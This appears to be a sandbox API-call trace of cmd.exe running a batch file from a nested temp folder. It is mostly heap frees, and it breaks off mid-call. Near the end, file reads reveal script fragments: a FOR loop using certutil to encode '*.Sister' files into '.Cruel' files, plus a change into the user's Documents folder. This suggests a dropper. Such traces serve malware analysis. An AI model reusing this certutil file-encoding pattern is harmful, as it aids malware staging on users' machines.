GetProcessHeap () returned 0x21ed8c70000 [0303.645] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95c40) returned 1 [0303.645] GetProcessHeap () returned 0x21ed8c70000 [0303.645] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c360) returned 1 [0303.645] GetProcessHeap () returned 0x21ed8c70000 [0303.645] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937daf0) returned 1 [0303.645] GetProcessHeap () returned 0x21ed8c70000 [0303.645] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9280080) returned 1 [0303.645] GetProcessHeap () returned 0x21ed8c70000 [0303.645] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96880) returned 1 [0303.645] GetProcessHeap () returned 0x21ed8c70000 [0303.645] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d09940) returned 1 [0303.650] GetProcessHeap () returned 0x21ed8c70000 [0303.650] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bad0) returned 1 [0303.650] GetProcessHeap () returned 0x21ed8c70000 [0303.650] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ce80) returned 1 [0303.650] GetProcessHeap () returned 0x21ed8c70000 [0303.650] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0b50) returned 1 [0303.651] GetProcessHeap () returned 0x21ed8c70000 [0303.651] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0ae0) returned 1 [0303.651] GetProcessHeap () returned 0x21ed8c70000 [0303.651] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c75b00) returned 1 [0303.651] GetProcessHeap () returned 0x21ed8c70000 [0303.651] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937cc70) returned 1 [0303.651] GetProcessHeap () returned 0x21ed8c70000 [0303.651] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d580) returned 1 [0303.651] GetProcessHeap () returned 0x21ed8c70000 [0303.651] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d098d0) returned 1 [0303.652] GetProcessHeap () returned 0x21ed8c70000 [0303.652] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6af20) returned 1 [0303.652] GetProcessHeap () returned 0x21ed8c70000 [0303.652] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cf98e0) returned 1 [0303.654] GetProcessHeap () returned 0x21ed8c70000 [0303.654] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8d50) returned 1 [0303.654] GetProcessHeap () returned 0x21ed8c70000 [0303.654] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7be40) returned 1 [0303.654] GetProcessHeap () returned 0x21ed8c70000 [0303.654] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b08d0) returned 1 [0303.655] GetProcessHeap () returned 0x21ed8c70000 [0303.655] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0860) returned 1 [0303.655] GetProcessHeap () returned 0x21ed8c70000 [0303.655] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c75a70) returned 1 [0303.655] GetProcessHeap () returned 0x21ed8c70000 [0303.655] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937caa0) returned 1 [0303.655] GetProcessHeap () returned 0x21ed8c70000 [0303.655] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65c10) returned 1 [0303.655] GetProcessHeap () returned 0x21ed8c70000 [0303.655] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cf9870) returned 1 [0303.656] GetProcessHeap () returned 0x21ed8c70000 [0303.656] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9378df0) returned 1 [0303.656] GetProcessHeap () returned 0x21ed8c70000 [0303.656] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8ce9880) returned 1 [0303.657] GetProcessHeap () returned 0x21ed8c70000 [0303.658] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45cb0) returned 1 [0303.658] GetProcessHeap () returned 0x21ed8c70000 [0303.658] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8950) returned 1 [0303.658] GetProcessHeap () returned 0x21ed8c70000 [0303.658] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b06d0) returned 1 [0303.658] GetProcessHeap () returned 0x21ed8c70000 [0303.658] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0660) returned 1 [0303.658] GetProcessHeap () returned 0x21ed8c70000 [0303.659] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95e00) returned 1 [0303.659] GetProcessHeap () returned 0x21ed8c70000 [0303.659] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d654d0) returned 1 [0303.659] GetProcessHeap () returned 0x21ed8c70000 [0303.659] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65870) returned 1 [0303.659] GetProcessHeap () returned 0x21ed8c70000 [0303.659] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8ce9810) returned 1 [0303.660] GetProcessHeap () returned 0x21ed8c70000 [0303.660] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6a960) returned 1 [0303.660] GetProcessHeap () returned 0x21ed8c70000 [0303.660] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cd9820) returned 1 [0303.662] GetProcessHeap () returned 0x21ed8c70000 [0303.662] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bd50) returned 1 [0303.662] GetProcessHeap () returned 0x21ed8c70000 [0303.662] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cc40) returned 1 [0303.662] GetProcessHeap () returned 0x21ed8c70000 [0303.662] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b03e0) returned 1 [0303.663] GetProcessHeap () returned 0x21ed8c70000 [0303.663] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0370) returned 1 [0303.663] GetProcessHeap () returned 0x21ed8c70000 [0303.663] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6ae90) returned 1 [0303.663] GetProcessHeap () returned 0x21ed8c70000 [0303.663] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66180) returned 1 [0303.663] GetProcessHeap () returned 0x21ed8c70000 [0303.663] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65fb0) returned 1 [0303.663] GetProcessHeap () returned 0x21ed8c70000 [0303.663] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cd97b0) returned 1 [0303.664] GetProcessHeap () returned 0x21ed8c70000 [0303.664] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45120) returned 1 [0303.665] GetProcessHeap () returned 0x21ed8c70000 [0303.665] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc97c0) returned 1 [0303.667] GetProcessHeap () returned 0x21ed8c70000 [0303.667] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8b90) returned 1 [0303.667] GetProcessHeap () returned 0x21ed8c70000 [0303.667] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bfd0) returned 1 [0303.667] GetProcessHeap () returned 0x21ed8c70000 [0303.667] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b01a0) returned 1 [0303.667] GetProcessHeap () returned 0x21ed8c70000 [0303.667] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0303.667] GetProcessHeap () returned 0x21ed8c70000 [0303.667] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c670) returned 1 [0303.667] GetProcessHeap () returned 0x21ed8c70000 [0303.667] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d656a0) returned 1 [0303.667] GetProcessHeap () returned 0x21ed8c70000 [0303.667] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65de0) returned 1 [0303.667] GetProcessHeap () returned 0x21ed8c70000 [0303.667] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc9750) returned 1 [0303.669] GetProcessHeap () returned 0x21ed8c70000 [0303.669] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6afe0) returned 1 [0303.669] GetProcessHeap () returned 0x21ed8c70000 [0303.670] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93a0140) returned 1 [0303.672] GetProcessHeap () returned 0x21ed8c70000 [0303.672] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8850) returned 1 [0303.672] GetProcessHeap () returned 0x21ed8c70000 [0303.672] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c160) returned 1 [0303.672] GetProcessHeap () returned 0x21ed8c70000 [0303.672] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56690) returned 1 [0303.672] GetProcessHeap () returned 0x21ed8c70000 [0303.672] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56620) returned 1 [0303.672] GetProcessHeap () returned 0x21ed8c70000 [0303.672] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c72860) returned 1 [0303.672] GetProcessHeap () returned 0x21ed8c70000 [0303.672] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65a40) returned 1 [0303.672] GetProcessHeap () returned 0x21ed8c70000 [0303.673] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64fa0) returned 1 [0303.673] GetProcessHeap () returned 0x21ed8c70000 [0303.673] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc96e0) returned 1 [0303.674] GetProcessHeap () returned 0x21ed8c70000 [0303.674] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c727b0) returned 1 [0303.674] GetProcessHeap () returned 0x21ed8c70000 [0303.674] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9390150) returned 1 [0303.676] GetProcessHeap () returned 0x21ed8c70000 [0303.676] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8810) returned 1 [0303.676] GetProcessHeap () returned 0x21ed8c70000 [0303.676] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bc10) returned 1 [0303.676] GetProcessHeap () returned 0x21ed8c70000 [0303.676] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56400) returned 1 [0303.676] GetProcessHeap () returned 0x21ed8c70000 [0303.676] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56390) returned 1 [0303.676] GetProcessHeap () returned 0x21ed8c70000 [0303.676] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c72720) returned 1 [0303.676] GetProcessHeap () returned 0x21ed8c70000 [0303.676] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64860) returned 1 [0303.676] GetProcessHeap () returned 0x21ed8c70000 [0303.676] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d644c0) returned 1 [0303.676] GetProcessHeap () returned 0x21ed8c70000 [0303.676] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93900e0) returned 1 [0303.677] GetProcessHeap () returned 0x21ed8c70000 [0303.677] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93796f0) returned 1 [0303.677] GetProcessHeap () returned 0x21ed8c70000 [0303.677] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93800f0) returned 1 [0303.678] GetProcessHeap () returned 0x21ed8c70000 [0303.678] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bc0) returned 1 [0303.678] GetProcessHeap () returned 0x21ed8c70000 [0303.678] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8890) returned 1 [0303.678] GetProcessHeap () returned 0x21ed8c70000 [0303.678] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d561e0) returned 1 [0303.678] GetProcessHeap () returned 0x21ed8c70000 [0303.678] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56170) returned 1 [0303.678] GetProcessHeap () returned 0x21ed8c70000 [0303.678] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c5e0) returned 1 [0303.678] GetProcessHeap () returned 0x21ed8c70000 [0303.678] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64dd0) returned 1 [0303.678] GetProcessHeap () returned 0x21ed8c70000 [0303.678] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64a30) returned 1 [0303.678] GetProcessHeap () returned 0x21ed8c70000 [0303.678] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9380080) returned 1 [0303.679] GetProcessHeap () returned 0x21ed8c70000 [0303.679] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7d2a0) returned 1 [0303.679] GetProcessHeap () returned 0x21ed8c70000 [0303.679] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cb7020) returned 1 [0303.680] GetProcessHeap () returned 0x21ed8c70000 [0303.680] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8790) returned 1 [0303.680] GetProcessHeap () returned 0x21ed8c70000 [0303.680] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bda0) returned 1 [0303.680] GetProcessHeap () returned 0x21ed8c70000 [0303.680] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d55f70) returned 1 [0303.680] GetProcessHeap () returned 0x21ed8c70000 [0303.680] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d55f00) returned 1 [0303.681] GetProcessHeap () returned 0x21ed8c70000 [0303.681] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c550) returned 1 [0303.681] GetProcessHeap () returned 0x21ed8c70000 [0303.681] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64c00) returned 1 [0303.681] GetProcessHeap () returned 0x21ed8c70000 [0303.681] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65170) returned 1 [0303.681] GetProcessHeap () returned 0x21ed8c70000 [0303.681] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8ca6fa0) returned 1 [0303.681] GetProcessHeap () returned 0x21ed8c70000 [0303.681] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96100) returned 1 [0303.681] GetProcessHeap () returned 0x21ed8c70000 [0303.681] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96fb0) returned 1 [0303.682] GetProcessHeap () returned 0x21ed8c70000 [0303.682] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7be90) returned 1 [0303.682] GetProcessHeap () returned 0x21ed8c70000 [0303.682] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c110) returned 1 [0303.682] GetProcessHeap () returned 0x21ed8c70000 [0303.682] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937a0c0) returned 1 [0303.682] GetProcessHeap () returned 0x21ed8c70000 [0303.682] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937a050) returned 1 [0303.682] GetProcessHeap () returned 0x21ed8c70000 [0303.682] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7d210) returned 1 [0303.682] GetProcessHeap () returned 0x21ed8c70000 [0303.682] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c380) returned 1 [0303.682] GetProcessHeap () returned 0x21ed8c70000 [0303.682] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64690) returned 1 [0303.682] GetProcessHeap () returned 0x21ed8c70000 [0303.682] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96f40) returned 1 [0303.683] GetProcessHeap () returned 0x21ed8c70000 [0303.683] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7d160) returned 1 [0303.683] GetProcessHeap () returned 0x21ed8c70000 [0303.683] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d32630) returned 1 [0303.683] GetProcessHeap () returned 0x21ed8c70000 [0303.683] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8750) returned 1 [0303.683] GetProcessHeap () returned 0x21ed8c70000 [0303.683] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c0c0) returned 1 [0303.683] GetProcessHeap () returned 0x21ed8c70000 [0303.683] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379e20) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45640) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d312a0) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d70) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95760) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c959e0) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cb80) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bf30) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d40) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96c40) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e60) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95540) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cee0) returned 1 [0303.684] GetProcessHeap () returned 0x21ed8c70000 [0303.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c967c0) returned 1 [0303.685] _get_osfhandle (_FileHandle=3) returned 0x98 [0303.685] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ff [0303.685] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x1fe, lpOverlapped=0x0) returned 1 [0303.685] SetFilePointer (in: hFile=0x98, lDistanceToMove=769, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x301 [0303.685] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\nr %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0303.685] _get_osfhandle (_FileHandle=3) returned 0x98 [0303.685] GetFileType (hFile=0x98) returned 0x1 [0303.686] _get_osfhandle (_FileHandle=3) returned 0x98 [0303.686] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x301 [0303.686] GetProcessHeap () returned 0x21ed8c70000 [0303.686] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32630 [0303.686] GetProcessHeap () returned 0x21ed8c70000 [0303.686] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d32630) returned 1 [0303.686] _tell (_FileHandle=3) returned 769 [0303.686] _close (_FileHandle=3) returned 0 [0303.687] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0303.687] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0303.687] _get_osfhandle (_FileHandle=3) returned 0x98 [0303.687] SetFilePointer (in: hFile=0x98, lDistanceToMove=769, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x301 [0303.687] _get_osfhandle (_FileHandle=3) returned 0x98 [0303.687] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x301 [0303.687] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x1fc, lpOverlapped=0x0) returned 1 [0303.687] SetFilePointer (in: hFile=0x98, lDistanceToMove=798, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31e [0303.687] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=29, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="cd %UserProFile%\\Documents\\\r\nutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 29 [0303.687] _get_osfhandle (_FileHandle=3) returned 0x98 [0303.688] GetFileType (hFile=0x98) returned 0x1 [0303.688] _get_osfhandle (_FileHandle=3) returned 0x98 [0303.688] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31e [0303.688] GetProcessHeap () returned 0x21ed8c70000 [0303.688] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32630 [0303.688] GetProcessHeap () returned 0x21ed8c70000 [0303.688] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4010) returned 0x21ed8d36650 [0303.688] GetProcessHeap () returned 0x21ed8c70000 [0303.688] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8d45dd0 [0303.688] GetEnvironmentVariableW (in: lpName="UserProFile", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0303.688] GetProcessHeap () returned 0x21ed8c70000 [0303.688] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45dd0) returned 1 [0303.688] GetProcessHeap () returned 0x21ed8c70000 [0303.688] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d36650) returned 1 [0303.688] GetProcessHeap () returned 0x21ed8c70000 [0303.688] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d32630) returned 1 [0303.689] _wcsicmp (_String1="cd", _String2=")") returned 58 [0303.689] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0303.689] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0303.689] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0303.689] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0303.689] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0303.689] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0303.689] GetProcessHeap () returned 0x21ed8c70000 [0303.689] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c967c0 [0303.689] GetProcessHeap () returned 0x21ed8c70000 [0303.689] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x16) returned 0x21ed8c95900 [0303.689] GetProcessHeap () returned 0x21ed8c70000 [0303.689] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7be90 [0303.689] _tell (_FileHandle=3) returned 798 [0303.689] _close (_FileHandle=3) returned 0 [0303.689] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0303.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.690] GetFileType (hFile=0x50) returned 0x2 [0303.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.690] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0303.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.691] WriteConsoleW (in: hConsoleOutput=0x50, 